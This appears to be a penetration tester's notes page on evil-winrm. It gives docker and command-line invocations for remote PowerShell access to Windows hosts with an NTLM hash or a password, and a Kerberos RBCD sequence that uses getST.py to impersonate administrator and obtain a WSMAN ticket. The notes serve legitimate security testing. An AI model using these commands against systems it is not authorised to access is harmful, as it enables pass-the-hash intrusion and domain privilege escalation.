# evil-winrm

evil-winrm is awesome for PowerShell remoting into Windows hosts, even when all you have is a local admin NTLM hash.

# Connect to host with evil-winrm using docker and an account hash

```bash
sudo docker run --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i 1.2.3.4 -u administrator -H YOUR-HASH-GOES-HERE
```

If you're going to connect with a password instead, replace `-H YOUR-HASH-GOES-HERE` with `-p YOUR-PASS-HERE`.

# Connect to host with a local directory mapped for uploads and downloads

This is important. If you want to be able to upload/download files during the session, the container needs a local directory mapped into it (here the host's payloads folder is mounted at `/data` inside the container) like so:

```bash
sudo docker run -v /home/sevminsec/Desktop/payloads:/data --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i 192.168.1.1 -u 7ms -p supsecpass!
```

# Use Kerberos

The README talks about how to get Kerberos going with evil-winrm, and I'm not sure how necessary the installation of the Kerberos packages was, nor the editing of `/etc/krb5.conf`. What I DO know is that I got all sorts of errors trying to make the Kerberos connection until I ran the following command inside of exegol:

```bash
evil-winrm -i HOST -r domain.com
```

# Misc Kerberos troubleshooting notes

If you're in an RBCD situation where you've obtained a TGS so that you can connect to (for example) the SMB service as admin, note that evil-winrm needs a ticket for the WSMAN service instead. I finally had a need to request a WinRM ticket so I could pass it to evil-winrm. The commands were as follows (with TT-DEV01 being the victim in a domain called tangent.town):

```bash
getST.py -impersonate administrator -spn 'WSMAN/TT-DEV01.tangent.town' -dc-ip 192.168.10.100 'tangent.town/PHANTOM$' -k -no-pass
```

```bash
export KRB5CCNAME=administrator@WSMAN_TT-DEV01.tangent.town@TANGENT.TOWN.ccache
```

```bash
evil-winrm -i TT-DEV01.tangent.town -r tangent.town --spn WSMAN
```